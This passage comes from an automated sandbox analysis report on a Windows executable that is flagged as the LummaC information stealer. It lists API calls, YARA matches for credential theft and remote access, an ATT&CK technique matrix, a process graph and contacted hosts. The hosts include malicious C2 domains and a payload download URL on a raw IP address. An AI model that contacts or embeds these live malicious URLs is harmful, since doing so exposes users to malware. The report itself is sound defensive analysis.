                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B00A
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_004351C0
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_0043B2CD
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_0043B282
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_0043B368
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B3F5
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_0043B645
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B76E
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_0043B875
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B942
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_00434DCD
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_024BB271
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_024B5034
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_024B5427
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_024BB4E9
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_024BB534
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: EnumSystemLocalesW,0_2_024BB5CF
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_024BBADC
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_024BBBA9
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,0_2_024BB8AC
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024BB9D5
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                Source: C:\Users\user\AppData\Local\Temp\C455.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 1.3.C455.tmp.exe.a40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.C455.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.C455.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.C455.tmp.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 1.3.C455.tmp.exe.a40000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.C455.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.C455.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.C455.tmp.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2221718420.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.1874232972.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024A1B33
                Source: C:\Users\user\Desktop\TN78WX7nJU.exeCode function: 0_2_024A0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024A0E5D
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Native API
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                OS Credential Dumping1
                System Time Discovery
                Remote Services1
                Screen Capture
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                1
                Virtualization/Sandbox Evasion
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol1
                Archive Collected Data
                12
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Process Injection
                Security Account Manager131
                Security Software Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information
                NTDS1
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture124
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                Obfuscated Files or Information
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                Software Packing
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading
                DCSync1
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575131 Sample: TN78WX7nJU.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 12 other signatures 2->50 8 TN78WX7nJU.exe 1 17 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49731, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 172.67.179.207, 443, 49730 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\C455.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (overwrites its own PE header) 8->52 13 C455.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 immureprech.biz 104.21.22.222, 443, 49732 CLOUDFLARENETUS United States 13->36 38 deafeninggeh.biz 104.21.96.1, 443, 49733 CLOUDFLARENETUS United States 13->38 40 steamcommunity.com 23.55.153.106, 443, 49735 AKAMAI-ASN1EU United States 13->40 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Detected unpacking (changes PE section rights) 13->58 60 2 other signatures 13->60 17 WerFault.exe 21 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                TN78WX7nJU.exe40%VirustotalBrowse
                TN78WX7nJU.exe45%ReversingLabsWin32.Trojan.LummaC
                TN78WX7nJU.exe100%AviraHEUR/AGEN.1312567
                TN78WX7nJU.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%AviraHEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Temp\C455.tmp.exe100%AviraHEUR/AGEN.1312567
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\C455.tmp.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe42%ReversingLabs
                C:\Users\user\AppData\Local\Temp\C455.tmp.exe42%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://diffuculttan.xyz/api100%Avira URL Cloudmalware
                https://wrathful-jammy.cyou/100%Avira URL Cloudmalware
                http://176.113.115.19/ScreenUpdateSync.exe100%Avira URL Cloudmalware
                https://community.faP0%Avira URL Cloudsafe
                https://avatars.fastly.D0%Avira URL Cloudsafe
                https://wrathful-jammy.cyou/?100%Avira URL Cloudmalware
                https://wrathful-jammy.cyou/C100%Avira URL Cloudmalware
                https://awake-weaves.cyou/apiH100%Avira URL Cloudmalware
                https://effecterectz.xyz/x100%Avira URL Cloudmalware
                https://deafeninggeh.biz/#100%Avira URL Cloudmalware
                http://176.113.115.19/_0%Avira URL Cloudsafe
                https://sordid-snaked.cyou/api~100%Avira URL Cloudmalware
                https://effecterectz.xyz/4100%Avira URL Cloudmalware
                https://effecterectz.xyz/100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                post-to-me.com
                172.67.179.207
                truefalse
                  high
                  steamcommunity.com
                  23.55.153.106
                  truefalse
                    high
                    immureprech.biz
                    104.21.22.222
                    truefalse
                      high
                      deafeninggeh.biz
                      104.21.96.1
                      truefalse
                        high
                        sordid-snaked.cyou
                        unknown
                        unknownfalse
                          high
                          diffuculttan.xyz
                          unknown
                          unknownfalse
                            high
                            effecterectz.xyz
                            unknown
                            unknownfalse
                              high
                              awake-weaves.cyou
                              unknown
                              unknownfalse
                                high
                                wrathful-jammy.cyou
                                unknown
                                unknownfalse
                                  high
                                  debonairnukk.xyz
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    sordid-snaked.cyoufalse
                                      high
                                      deafeninggeh.bizfalse
                                        high
                                        effecterectz.xyzfalse
                                          high
                                          wrathful-jammy.cyoufalse
                                            high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              high
                                              awake-weaves.cyoufalse
                                                high
                                                immureprech.bizfalse
                                                  high
                                                  https://immureprech.biz/apifalse
                                                    high
                                                    debonairnukk.xyzfalse
                                                      high
                                                      diffuculttan.xyzfalse
                                                        high
                                                        https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://player.vimeo.comC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://steamcommunity.com/?subsection=broadcastsC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://store.steampowered.com/subscriber_agreement/C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.gstatic.cn/recaptcha/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://176.113.115.19/ScreenUpdateSync.exeTN78WX7nJU.exe, 00000000.00000003.1840353767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091039362.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.valvesoftware.com/legal.htmC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.youtube.comC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.google.comC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englC455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7TC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://diffuculttan.xyz/apiC455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://s.ytimg.com;C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.fastly.steamstatic.com/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://steam.tv/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://post-to-me.com/track_prt.php?sub=&cc=DETN78WX7nJU.exe, 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                        high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&l=eC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEBC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985908975.0000000000B42000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://store.steampowered.com/privacy_agreement/C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222077563.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://wrathful-jammy.cyou/C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://store.steampowered.com/points/shop/C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://sketchfab.comC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cnC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://community.faPC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985978022.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://www.youtube.com/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://store.steampowered.com/privacy_agreement/C455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://post-to-me.com/track_prt.php?sub=TN78WX7nJU.exefalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amC455.tmp.exe, 00000001.00000003.1985811221.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985949677.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/recaptcha/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://checkout.steampowered.com/C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://avatars.fastly.DC455.tmp.exe, 00000001.00000003.1985964897.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000003.1985826885.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222059436.0000000000BBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://post-to-me.com/TN78WX7nJU.exe, 00000000.00000002.4215422078.0000000000A32000.00000004.00000020.00020000.00000000.sdmp, TN78WX7nJU.exe, 00000000.00000003.4091067138.0000000000A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://wrathful-jammy.cyou/?C455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://awake-weaves.cyou/apiHC455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          https://wrathful-jammy.cyou/CC455.tmp.exe, 00000001.00000003.1985854742.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, C455.tmp.exe, 00000001.00000002.2222002497.0000000000B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
